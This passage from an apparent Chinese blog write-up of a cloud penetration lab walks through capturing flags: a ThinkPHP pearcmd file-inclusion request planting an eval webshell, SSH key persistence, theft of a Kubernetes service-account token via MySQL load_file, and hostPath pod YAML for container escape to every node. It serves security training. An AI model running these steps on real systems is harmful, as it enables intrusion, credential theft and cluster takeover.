\/code><\/p>\n<pre><code class=\"language-text\">POST \/minio\/webrpc HTTP\/1.1\nHost: 172.22.18.23\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/87.0.4280.141 Safari\/537.36\nContent-Type: application\/json\nContent-Length: 76\n\n{&quot;id&quot;:1,&quot;jsonrpc&quot;:&quot;2.0&quot;,&quot;params&quot;:{&quot;token&quot;:&quot;Test&quot;},&quot;method&quot;:&quot;web.LoginSTS&quot;}<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_9.png\" alt=\"cloudnet_9\" \/><\/p>\n<p>\u63a5\u6536\u5230shell\u540e\u5728\u6302\u8f7d\u76ee\u5f55\u67e5\u770b\u5230\u7b2c\u4e09\u4e2aflag<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_10.png\" alt=\"cloudnet_10\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_11.png\" alt=\"cloudnet_11\" \/><\/p>\n<p>\u5199ssh\u516c\u94a5\u7ef4\u6743<\/p>\n<pre><code class=\"language-text\">echo -e &quot;\\n\\nssh-rsa AAAAB3NzaC...kwaQ== root@kali\\n\\n&quot; &gt;&gt; \/mnt\/root\/.ssh\/authorized_keys<\/code><\/pre>\n<pre><code class=\"language-text\">proxychains4 -q ssh root@172.22.18.29<\/code><\/pre>\n<p>\u8fd9\u91cc\u53ef\u4ee5\u770b\u5230\u901a\u8fc7docker api\u521b\u5efa\u5bb9\u5668\u9003\u9038\u540e\uff0c\u8fdessh\u5c31\u662fminio\u6240\u5728\u7684\u90a3\u53f0\u4e3b\u673a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_12.png\" alt=\"cloudnet_12\" \/><\/p>\n<p>\u4f20\u4e2afscan\u9a8c\u8bc1\u4e00\u4e0b\uff0c\u786e\u5b9e2375\u7aef\u53e3\u5b58\u5728docker api\u672a\u6388\u6743<\/p>\n<pre><code class=\"language-text\">proxychains4 -q scp -i \/root\/.ssh\/id_rsa fscan root@172.22.18.29:\/tmp\/ <\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_13.png\" alt=\"cloudnet_13\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_14.png\" alt=\"cloudnet_14\" \/><\/p>\n<h3>flag4 &amp; flag5 &amp; flag6<\/h3>\n<h4>\u6781\u81f4cms(ThinkPHP)\u591a\u8bed\u8a00\u6a21\u5757\u6587\u4ef6\u5305\u542bRCE<\/h4>\n<p>\u901a\u8fc7<code>http:\/\/172.22.18.61<\/code>\u8bbf\u95ee\u4e0d\u5b58\u5728\u8def\u5f84\u53ef\u4ee5\u5f97\u77e5\u662f\u6781\u81f4cms\uff0c\u7528\u7684thinkphp\u6846\u67b6<\/p>\n<p>\u4f46\u662f\u4e0d\u592a\u6e05\u695a\u4e3a\u4ec0\u4e48\u77e5\u9053\u662f\u7528\u7684\u591a\u8bed\u8a00RCE\u8fd9\u4e2a\u6d1e\uff0c\u6309\u7406\u8bf4\u5bf9\u8fd9\u4e2a\u6d1e\u8fdb\u884c\u63a2\u6d4b\u7684\u8bdd\uff0c\u662f\u770b\u8bf7\u6c42\u5305\u7684cookie\u6709\u65e0\u7c7b\u4f3c<code>think_lang=zh_cn<\/code>\u5b57\u6bb5\u6765\u5224\u65adtp\u662f\u5426\u6709\u5f00\u542f\u591a\u8bed\u8a00\u529f\u80fd\uff0c\u7c7b\u4f3c<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_15.png\" alt=\"cloudnet_15\" \/><\/p>\n<p>\u5728<code>172.22.18.61<\/code>\u6293\u5305\u5e76\u6ca1\u6709\u5728\u8bf7\u6c42\u5934\u770b\u5230<code>think_lang<\/code>\u5b57\u6bb5\uff0c\u5e76\u4e14\u8fd8fuzz\u51fa\u4f20\u9012\u7684<code>lang<\/code>\u53c2\u6570\u53d8\u6210\u4e86<code>l<\/code>\uff0c\u53ea\u80fd\u8bf4\u5927\u5934\u5e08\u5085tql<\/p>\n<pre><code class=\"language-text\">GET \/index.php?l=..\/..\/..\/..\/..\/..\/..\/..\/usr\/local\/lib\/php\/pearcmd&amp;+config-create+\/&lt;?=eval($_POST[1]);?&gt;+\/var\/www\/html\/sim.php HTTP\/1.1\nHost: 172.22.18.61\nUser-Agent: Mozilla\/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/115.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_16.png\" alt=\"cloudnet_16\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_17.png\" alt=\"cloudnet_17\" \/><\/p>\n<p>\u8681\u5251\u8fde\u63a5\u540e\u914d\u7f6e\u6587\u4ef6\u770b\u5230mysql\u8d26\u5bc6<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_18.png\" alt=\"cloudnet_18\" \/><\/p>\n<pre><code class=\"language-text\">&#039;db&#039; =&gt; \narray (\n&#039;host&#039; =&gt; &#039;mysql&#039;,\n&#039;dbname&#039; =&gt; &#039;jizhicms&#039;,\n&#039;username&#039; =&gt; &#039;root&#039;,\n&#039;password&#039; =&gt; &#039;Mysqlroot@!123&#039;,\n&#039;prefix&#039; =&gt; &#039;jz_&#039;,\n&#039;port&#039; =&gt; &#039;3306&#039;,\n)<\/code><\/pre>\n<p>\u7528\u8681\u5251\u81ea\u5e26\u6570\u636e\u5e93\u8fde\u63a5<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_19.png\" alt=\"cloudnet_19\" \/><\/p>\n<p>\u4e0d\u8fc7\u8fd9\u91cc\u5927\u5934\u5e08\u5085\u8bf4\u7684\u6709\u4e9b\u95ee\u9898\uff0c<code>select user();<\/code>\u663e\u793a\u7684ip\u5e76\u4e0d\u662fmysql\u670d\u52a1\u5668\u6240\u5728\u7684ip\uff0c\u800c\u662f\u5f53\u524d\u8fde\u63a5\u7684\u5ba2\u6237\u7aefIP\uff0c\u73b0\u5728\u662f\u901a\u8fc7web\u670d\u52a1\u5668\u53bb\u8fde\u63a5mysql\uff0c\u6240\u4ee5\u663e\u793a\u7684ip\u5e94\u8be5\u662f\u6781\u81f4cms\u90a3\u53f0\u7684ip<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_20.png\" alt=\"cloudnet_20\" \/><\/p>\n<p>\u67e5\u770bmysql\u6570\u636e\u5e93\u4e3b\u673a\u540d<\/p>\n<pre><code class=\"language-text\">SHOW VARIABLES LIKE &#039;hostname&#039;;\n\/\/mysql-6df876d6dc-f6qfg<\/code><\/pre>\n<p>\u63a5\u7740\u56de\u53bbwebshell\u770b\u4e00\u4e0b\u4e3b\u673a\u4fe1\u606f\uff0c\u53d1\u73b0\u662f\u5728Kubernetes\u4e2d\uff0c\u7ed3\u5408hostname\uff0c\u8be5\u673a\u5668\u5e94\u8be5\u662f\u67d0\u4e2anode\u7528\u6765\u8fd0\u884cweb\u670d\u52a1\u7684container\uff08\u8fd9\u91cc\u770b\u5230<code>172.20.166.134<\/code>\u5bf9\u5e94\u7684\u4e3b\u673a\u540d\u662f<code>web-app-d57c8d67-rm2nk<\/code>\uff0c\u4e5f\u5370\u8bc1\u4e86\u524d\u9762ip\u662fweb\u670d\u52a1\u5668\u800c\u975emysql\u670d\u52a1\u5668\u7684ip\uff09<\/p>\n<pre><code class=\"language-text\">(www-data:\/var\/www\/html) $ cat \/etc\/hosts\n# Kubernetes-managed hosts file.\n127.0.0.1    localhost\n::1    localhost ip6-localhost ip6-loopback\nfe00::0    ip6-localnet\nfe00::0    ip6-mcastprefix\nfe00::1    ip6-allnodes\nfe00::2    ip6-allrouters\n172.20.166.134    web-app-d57c8d67-rm2nk<\/code><\/pre>\n<h4>\u9ed8\u8ba4\u8def\u5f84\u83b7\u53d6 Kubernetes \u7684sa token<\/h4>\n<p>\u7528\u9ed8\u8ba4\u6302\u8f7d\u8def\u5f84\u8bfb\u4e00\u4e0btoken\uff0c\u5728mysql\u7528<code>load_file<\/code>\u51fd\u6570\u8bfb\u53d6\u6587\u4ef6\uff0c\u62ff\u5230\u4e00\u4e2asa token<\/p>\n<pre><code class=\"language-mysql\">select load_file(&quot;\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token&quot;);<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_21.png\" alt=\"cloudnet_21\" \/><\/p>\n<pre><code class=\"language-text\">eyJhbGciOiJSUzI1NiIsImtp.....<\/code><\/pre>\n<p>\u62ff\u6781\u81f4\u90a3\u53f0web\u670d\u52a1\u5668\u5728\u540c\u6837\u4f4d\u7f6e\u8bfb\u53d6token\uff0c\u53d1\u73b0\u4e0d\u4e00\u6837\uff0c\u8bf4\u660e\u786e\u5b9e\u662f\u7ad9\u5e93\u5206\u79bb\u7684<\/p>\n<p>\u540e\u7eed\u6253 Kubernetes \u5c31\u6709\u597d\u51e0\u79cd\u6253\u6cd5\u4e86<\/p>\n<h4>Kubernetes \u6253\u6cd5\u4e00<\/h4>\n<h5>kubectl \u5bb9\u5668\u6302\u8f7d\u9003\u9038<\/h5>\n<p>\u4e0a\u4f20cdk<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_22.png\" alt=\"cloudnet_22\" \/><\/p>\n<p><code>https:\/\/10.68.0.1<\/code>\u6307\u5411\u7684\u5c31\u662f Kubernetes API Server\uff0c<code>10.68.0.1<\/code>\u4e5f\u662fmaster\u8282\u70b9\u7684\u5185\u90e8 Cluster IP<\/p>\n<p>\u76ee\u524d\u53ea\u6709\u6781\u81f4cms\u8fd9\u53f0\u673a\u5728 Kubernetes \u4e2d\uff0c\u4f46\u662f\u5982\u679c\u6839\u636e\u524d\u9762\u731c\u6d4b\u8fd9\u53f0\u53ea\u662fContainer\u7684\u8bdd\uff0c\u90a3\u4e48\u5e94\u8be5\u53ea\u662f\u628aweb\u670d\u52a1\u6620\u5c04\u5230\u4e86\u5bbf\u4e3b\u673a\u768480\u7aef\u53e3\uff0c\u56e0\u6b64\u642d\u6b63\u5411\u4ee3\u7406\u662f\u884c\u4e0d\u901a\u7684\uff08\u8bd5\u4e86Stowaway\u642d\u53cd\u5411\u4ee3\u7406\u597d\u50cf\u4e5f\u4e0d\u901a\uff09<\/p>\n<p>\u56e0\u4e3a\u673a\u5b50\u6709web\u670d\u52a1\uff0c\u6240\u4ee5\u53ef\u4ee5\u50cf\u5927\u5934\u5e08\u5085\u90a3\u6837\u7528<code>Neo-reGeorg<\/code>\u642d\u53cd\u5411\u4ee3\u7406\uff0c\u5c06<code>tunnel.php<\/code>\u4e0a\u4f20\u4e4b\u540e\u914d\u5408proxifier\u5f88\u65b9\u4fbf<\/p>\n<p>\u4e4b\u540e\u521b\u5efakubeconfig<\/p>\n<p>k8s.yaml<\/p>\n<pre><code class=\"language-yaml\">apiVersion: v1\nkind: Config\nclusters:\n  - name: my-cluster\n    cluster:\n      server: https:\/\/10.68.0.1\/\n      # certificate-authority: \/path\/to\/ca.crt  # \u66ff\u6362\u4e3a\u4f60\u7684 CA \u8bc1\u4e66\u8def\u5f84\u3002\u5982\u679c\u65e0\u9700 CA \u9a8c\u8bc1\uff0c\u53ef\u5220\u9664\u6b64\u884c\n      insecure-skip-tls-verify: true  # \u5982\u679c\u4f60\u60f3\u8df3\u8fc7\u8bc1\u4e66\u9a8c\u8bc1\uff0c\u8bf7\u53d6\u6d88\u6b64\u884c\u6ce8\u91ca\uff08\u5df2\u4fee\u6b63\u7f29\u8fdb\u548c\u7a7a\u683c\uff09\nusers:\n  - name: my-user\n    user:\n      token: eyJhbGciOiJS...h8g4JQ\ncontexts:\n  - name: my-context\n    context:\n      cluster: my-cluster\n      user: my-user\ncurrent-context: my-context<\/code><\/pre>\n<p>\u67e5\u8be2\u96c6\u7fa4\u8282\u70b9\u4fe1\u606f<\/p>\n<pre><code class=\"language-text\">kubectl --kubeconfig k8s.yaml get nodes<\/code><\/pre>\n<p>\u663e\u793a\u5173\u4e8e&quot;master&quot;\u8282\u70b9\u7684\u8be6\u7ec6\u4fe1\u606f<\/p>\n<pre><code class=\"language-text\">kubectl --kubeconfig k8s.yaml describe node master<\/code><\/pre>\n<p>\u7528uncordon\u5c06master\u8282\u70b9\u6807\u8bb0\u4e3a\u53ef\u8c03\u5ea6\u72b6\u6001<\/p>\n<pre><code class=\"language-text\">kubectl --kubeconfig k8s.yaml uncordon master<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_23.png\" alt=\"cloudnet_23\" \/><\/p>\n<p>\u8fd9\u91cc\u4e5f\u53ef\u4ee5\u76f4\u63a5\u7528 kubectl \u76f4\u63a5\u6307\u5b9a token \u6267\u884c\u547d\u4ee4<\/p>\n<pre><code class=\"language-text\">kubectl -s https:\/\/10.68.0.1\/ --insecure-skip-tls-verify=true --token=eyJhbGciOiJS.... describe nodes<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_24.png\" alt=\"cloudnet_24\" \/><\/p>\n<p>\u7ee7\u7eed\u7f16\u5199yaml\u6587\u4ef6\uff0c\u901a\u8fc7<code>172.22.18.64\/public\/mysql:5.6<\/code>\u955c\u50cf\u62c9\u53d6\u5bb9\u5668\uff0c\u5e76\u5c06node1\u8282\u70b9\u7684\u6839\u76ee\u5f55\u6302\u8f7d\u5230\u5bb9\u5668\u7684<code>\/simho<\/code>\u76ee\u5f55\u4e0b\uff0c\u6dfb\u52a0<code>node.kubernetes.io\/unschedulable:NoSchedule<\/code>\u5bb9\u5fcd\u6c61\u70b9\u6709\u5907\u65e0\u60a3<\/p>\n<p>pod1.yaml<\/p>\n<pre><code class=\"language-yaml\">apiVersion: v1\nkind: Pod\nmetadata:\n  name: evilpod1\nspec:\n  nodeName: node1 # node2 master\n  tolerations:\n    - key: node.kubernetes.io\/unschedulable\n      operator: Exists\n      effect: NoSchedule\n  containers:\n    - name: mycontainer\n      image: 172.22.18.64\/public\/mysql:5.6\n      command: [&quot;\/bin\/sleep&quot;, &quot;3650d&quot;]\n      volumeMounts:\n        - name: test\n          mountPath: \/simho\n  volumes:\n    - name: test\n      hostPath:\n        path: \/\n        type: Directory<\/code><\/pre>\n<p>\u5e94\u7528yaml\u6587\u4ef6\uff0c\u521b\u5efa\u5bb9\u5668\u540e\u8ddfdocker\u4e00\u6837\u76f4\u63a5bash\u6267\u884c\u547d\u4ee4<\/p>\n<pre><code class=\"language-text\">kubectl --kubeconfig k8s.yaml apply -f pod1.yaml \nkubectl --kubeconfig k8s.yaml exec -it evilpod1 -- \/bin\/bash<\/code><\/pre>\n<p>node2\u8ddfmaster\u8282\u70b9\u5982\u6cd5\u70ae\u5236\uff08\u8fd9\u91ccmaster\u8282\u70b9\u4e3a\u4ec0\u4e48\u4e5f\u53ef\u4ee5\u901a\u8fc7mysql\u8fd9\u4e2a\u955c\u50cf\u9003\u9038\u540e\u7eed\u4f1a\u8bf4\u660e\uff09<\/p>\n<p>\u62ff\u5230\u7b2c\u56db\u3001\u7b2c\u4e94\u548c\u7b2c\u516d\u4e2aflag<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_25.png\" alt=\"cloudnet_25\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_26.png\" alt=\"cloudnet_26\" \/><\/p>\n<h4>Kubernetes \u6253\u6cd5\u4e8c<\/h4>\n<h5>Kubernetes Dashboard \u5bb9\u5668\u6302\u8f7d\u9003\u9038<\/h5>\n<p>\u6781\u81f4\u90a3\u53f0\u673a\u4f20fscan\uff0c\u626b\u4e00\u4e0b\u5168\u7aef\u53e3<\/p>\n<pre><code class=\"language-text\">start infoscan\n172.22.18.61:22 open\n172.22.18.61:80 open\n172.22.18.61:111 open\n172.22.18.61:179 open\n172.22.18.61:9253 open\n172.22.18.61:9353 open\n172.22.18.61:10248 open\n172.22.18.61:10256 open\n172.22.18.61:10250 open\n172.22.18.61:10249 open\n172.22.18.61:30020 open\n172.22.18.61:32686 open\n[*] alive ports len is: 12\nstart vulscan\n[*] WebTitle http:\/\/172.22.18.61:9353  code:404 len:19     title:None\n[*] WebTitle http:\/\/172.22.18.61:9253  code:404 len:19     title:None\n[*] WebTitle http:\/\/172.22.18.61:10249 code:404 len:19     title:None\n[*] WebTitle http:\/\/172.22.18.61:10256 code:404 len:19     title:None\n[*] WebTitle https:\/\/172.22.18.61:32686 code:200 len:1422   title:Kubernetes Dashboard\n[+] InfoScan https:\/\/172.22.18.61:32686 [Kubernetes] \n[*] WebTitle http:\/\/172.22.18.61:10248 code:404 len:19     title:None\n[*] WebTitle http:\/\/172.22.18.61       code:200 len:8710   title:\u533b\u9662\u5185\u90e8\u5e73\u53f0\n[*] WebTitle https:\/\/172.22.18.61:10250 code:404 len:19     title:None\n[*] WebTitle http:\/\/172.22.18.61:30020 code:200 len:8710   title:\u533b\u9662\u5185\u90e8\u5e73\u53f0<\/code><\/pre>\n<p>\u626b\u5230 Kubernetes Dashboard \u7aef\u53e3\u4e3a32686\uff08Dashboard \u9ed8\u8ba4\u7aef\u53e3\u4e3a <code>30000-32767<\/code> \u8303\u56f4\u5185\u7684\u968f\u673a\u7aef\u53e3\uff09<\/p>\n<p>\u7528mysql\u670d\u52a1\u5668\u6216\u8005\u6781\u81f4cms\u670d\u52a1\u5668\u8bfb\u53d6\u7684token\u90fd\u53ef\u4ee5\u767b\u5f55\uff0c\u4f46\u662f\u7528\u6781\u81f4\u90a3\u53f0token\u8fdb\u53bb\u4e4b\u540e\u6743\u9650\u5f88\u5c0f\uff0c\u57fa\u672c\u4ec0\u4e48\u90fd\u770b\u4e0d\u5230\uff0cmysql\u670d\u52a1\u5668\u8bfb\u7684token\u6743\u9650\u5c31\u5f88\u9ad8<\/p>\n<p>\u8fd9\u91cc\u770b\u5230node1\u8282\u70b9\u8ddfnode2\u8282\u70b9\u5206\u522b\u6709\u4e2apod\uff0c\u4e00\u53f0web\u670d\u52a1\u5668\uff0c\u4e00\u53f0mysql\u670d\u52a1\u5668\uff0c\u5b83\u4eec\u7684 hostname \u6b63\u597d\u5c31\u662f\u524d\u9762\u90a3\u4e24\u53f0<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_27.png\" alt=\"cloudnet_27\" \/><\/p>\n<p>\u8ddf\u524d\u9762\u6253\u6cd5\u4e00\u6837\uff0c\u7f16\u5199yaml\uff0c\u521b\u5efa\u4e00\u4e2a\u5bb9\u5668\u6302\u8f7d\u9003\u9038\uff08node1\u8282\u70b9\u7684\u955c\u50cf\u7528 jizhicms \u6216\u8005 mysql\u90fd\u53ef\u4ee5\uff09<\/p>\n<pre><code class=\"language-yaml\">apiVersion: v1\nkind: Pod\nmetadata:\n  name: simho\nspec:\n  containers:\n  - image: 172.22.18.64\/hospital\/jizhicms:2.5.0\n    name: test-container\n    volumeMounts:\n    - mountPath: \/simho\n      name: test-volume\n  volumes:\n  - name: test-volume\n    hostPath:\n      path: \/<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_28.png\" alt=\"cloudnet_28\" \/><\/p>\n<p>\u53ef\u4ee5\u5728 Dashboard \u76f4\u63a5\u7ba1\u7406shell\uff0c\u9003\u9038\u5230node1\u8282\u70b9\u7684\u5bbf\u4e3b\u673a\u540e\u5728\u6839\u76ee\u5f55\u770b\u5230\u7b2c\u56db\u4e2aflag<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_29.png\" alt=\"cloudnet_29\" \/><\/p>\n<p>\u5982\u6cd5\u70ae\u5236\uff0c\u7ee7\u7eed\u5199yaml\uff0c\u9003\u9038node2\u8ddfmaster\u8282\u70b9\uff0c\u76f4\u63a5\u901a\u8fc7Dashboard\u81ea\u5e26shell\u67e5\u770bflag\u5373\u53ef<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_30.png\" alt=\"cloudnet_30\" \/><\/p>\n<p>\u6ce8\u610f\uff1a\u8fd9\u91ccnode2\u8ddfmaster\u8282\u70b9\u5982\u679c\u955c\u50cf\u7ee7\u7eed\u76f4\u63a5\u7528<code>172.22.18.64\/hospital\/jizhicms:2.5.0<\/code>\u4f1a\u521b\u5efa\u5bb9\u5668\u5931\u8d25\uff0c\u5f97\u5230\u5982\u4e0b\u62a5\u9519\uff0c\u56e0\u4e3a\u8be5\u955c\u50cf\u662f\u79c1\u6709\u955c\u50cf\uff0c\u65e0\u6cd5\u76f4\u63a5\u62c9\u53d6<\/p>\n<pre><code class=\"language-text\">Failed to pull image &quot;172.22.18.64\/hospital\/jizhicms:2.5.0&quot;: failed to pull and unpack image &quot;172.22.18.64\/hospital\/jizhicms:2.5.0&quot;: failed to resolve reference &quot;172.22.18.64\/hospital\/jizhicms:2.5.0&quot;: pull access denied, repository does not exist or may require authorization: authorization failed: no basic auth credentials<\/code><\/pre>\n<p>\u67e5\u770b\u539f\u672cnode1\u8282\u70b9\u4e2d\u7684pod\uff0c\u53ef\u4ee5\u770b\u5230 Kubernetes \u7684 Secrets \u8d44\u6e90\u6709\u4e00\u4e2a<code>harbor-registry-secret<\/code>\uff0c\u63a5\u4e0b\u6765\u5c31\u53ef\u4ee5\u901a\u8fc7\u6dfb\u52a0<code>imagePullSecrets<\/code>\u6765\u8fdb\u884c\u5bf9\u79c1\u6709\u955c\u50cf\u4ed3\u5e93\u8ba4\u8bc1\uff0c\u4ece\u800c\u62c9\u53d6 jizhicms:2.5.0\u955c\u50cf<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_31.png\" alt=\"cloudnet_31\" \/><\/p>\n<p>\u4fee\u6539\u540e\u7684yaml\uff0c\u5bf9node2\u8ddfmaster\u8282\u70b9\u8fdb\u884c\u5bb9\u5668\u6302\u8f7d\u9003\u9038<\/p>\n<pre><code class=\"language-yaml\">apiVersion: v1\nkind: Pod\nmetadata:\n  name: simho6\nspec:\n  nodeName: master # node2\n  imagePullSecrets:\n    - name: harbor-registry-secret\n  tolerations:\n    - key: node.kubernetes.io\/unschedulable\n      operator: Exists\n      effect: NoSchedule\n  containers:\n    - name: mycontainer\n      image: 172.22.18.64\/hospital\/jizhicms:2.5.0\n      command: [&quot;\/bin\/sleep&quot;, &quot;3650d&quot;]\n      volumeMounts:\n        - name: test\n          mountPath: \/adminsim\n  volumes:\n    - name: test\n      hostPath:\n        path: \/\n        type: Directory<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_32.png\" alt=\"cloudnet_32\" \/><\/p>\n<p>\u90a3\u4e3a\u4ec0\u4e48\u62c9mysql:5.6\u955c\u50cf\u5c31\u53ef\u4ee5\u76f4\u63a5\u6302\u8f7dnode2\u8ddfmaster\u8282\u70b9\u5462\uff0c\u53ef\u4ee5\u770b\u4e00\u4e0b\u539f\u672cnode2\u8282\u70b9\u4e2d\u7684pod\u5c31\u662f\u7531mysql:5.6\u62c9\u53d6\u7684\uff0c\u5176SA\u4e3amysql<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_33.png\" alt=\"cloudnet_33\" \/><\/p>\n<p>\u7ee7\u7eed\u67e5\u770b\u8be5mysql\u8d26\u6237\uff0c\u5c5e\u4e8eadmin\u89d2\u8272\uff0c\u70b9\u8fdb\u53bb\u53d1\u73b0\u662f\u6709\u4f17\u591a\u6743\u9650\u7684\uff0c\u8fd9\u4e5f\u89e3\u91ca\u4e86\u4e3a\u4ec0\u4e48\u901a\u8fc7mysql\u90a3\u53f0\u670d\u52a1\u5668\u8bfb\u53d6\u7684 token \u6709\u9ad8\u6743\u9650\u7684\u539f\u56e0\uff0c\u5e76\u4e14node2\u8ddfmaster\u8282\u70b9\u90fd\u80fd\u901a\u8fc7mysql:5.6\u955c\u50cf\u53bb\u8fdb\u884c\u6302\u8f7d\u9003\u9038<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_34.png\" alt=\"cloudnet_34\" \/><\/p>\n<h3>flag7<\/h3>\n<p>\u4efb\u9009\u4e00\u4e2a\u4ece\u5bb9\u5668\u9003\u9038\u51fa\u6765\u7684node\u5bbf\u4e3b\u673a\uff0c\u67e5\u770b<code>\/etc\/hosts<\/code>\u80fd\u591f\u83b7\u53d6\u4e09\u4e2a\u8282\u70b9\u5bf9\u5e94\u7684node ip<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_35.png\" alt=\"cloudnet_35\" \/><\/p>\n<p>\u8fd9\u91cc\u67e5\u770bnode1\u5bbf\u4e3b\u673a\u4e5f\u6709web\u670d\u52a1\uff0c\u5e76\u4e14\u4e5f\u662f\u6781\u81f4cms\uff0c\u5f53\u65f6\u4ee5\u4e3a<code>172.22.18.61<\/code>\u90a3\u53f0\u768480\u7aef\u53e3\u5bf9\u5e94\u7684\u76f4\u63a5\u662fnode1\u5bbf\u4e3b\u673a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_36.png\" alt=\"cloudnet_35\" \/><\/p>\n<p>\u4f46\u662fweb\u76ee\u5f55\u6ca1\u6709\u5f53\u65f6\u5199\u9a6c\u7684\u6587\u4ef6\uff0c\u5e76\u4e14\u5728Dashboard\u53ef\u4ee5\u770b\u5230\u6781\u81f4cms\u90a3\u53f0web\u5bb9\u5668\u7684yaml\u914d\u7f6e\u6587\u4ef6\uff0c\u662f\u5c0680\u7aef\u53e3\u6620\u5c04\u51fa\u6765\u7684<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_37.png\" alt=\"cloudnet_37\" \/><\/p>\n<p>\u56e0\u6b64\u4e0e\u4e00\u5f00\u59cb\u7684\u731c\u6d4b\u4e00\u6837\uff0c<code>172.22.18.61<\/code>\u867d\u7136\u5bf9\u5e94\u7684\u662fnode1\u8282\u70b9\u7684\u5bbf\u4e3b\u673aip\uff0c\u4f46\u662f\u517680\u7aef\u53e3\u5bf9\u5e94\u7684\u662fpod\u91cccontainer\u7684web\u670d\u52a1<\/p>\n<p>\u641e\u6e05\u695a\u4e4b\u540e\uff0c\u5728\u5bbf\u4e3b\u673a\u5199\u4e2a\u516c\u94a5<\/p>\n<pre><code class=\"language-text\">echo -e &quot;\\n\\nssh-rsa AAAAB3N...waQ== root@kali\\n\\n&quot; &gt;&gt; \/simho\/root\/.ssh\/authorized_keys\n\nproxychains4 -q ssh root@172.22.18.61<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_38.png\" alt=\"image-20250522130158793\" \/><\/p>\n<p>\u67e5\u770b\u7f51\u5361\uff0c\u4e00\u4e2a\u662fnode ip\uff0c\u4e00\u4e2a\u662f\u5916\u7f51ip\uff08\u8fd9\u91cc\u7684\u5916\u7f51\u6307\u7684\u662f\u76f8\u5bf9\u4e8ekubernetes\u73af\u5883\u7684\u5916\u7f51\uff09<\/p>\n<pre><code class=\"language-text\">eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 172.22.15.45  netmask 255.255.0.0  broadcast 172.22.255.255\n        inet6 fe80::216:3eff:fe37:f660  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 00:16:3e:37:f6:60  txqueuelen 1000  (Ethernet)\n        RX packets 65883  bytes 29270537 (27.9 MiB)\n        RX errors 0  dropped 0  overruns 0  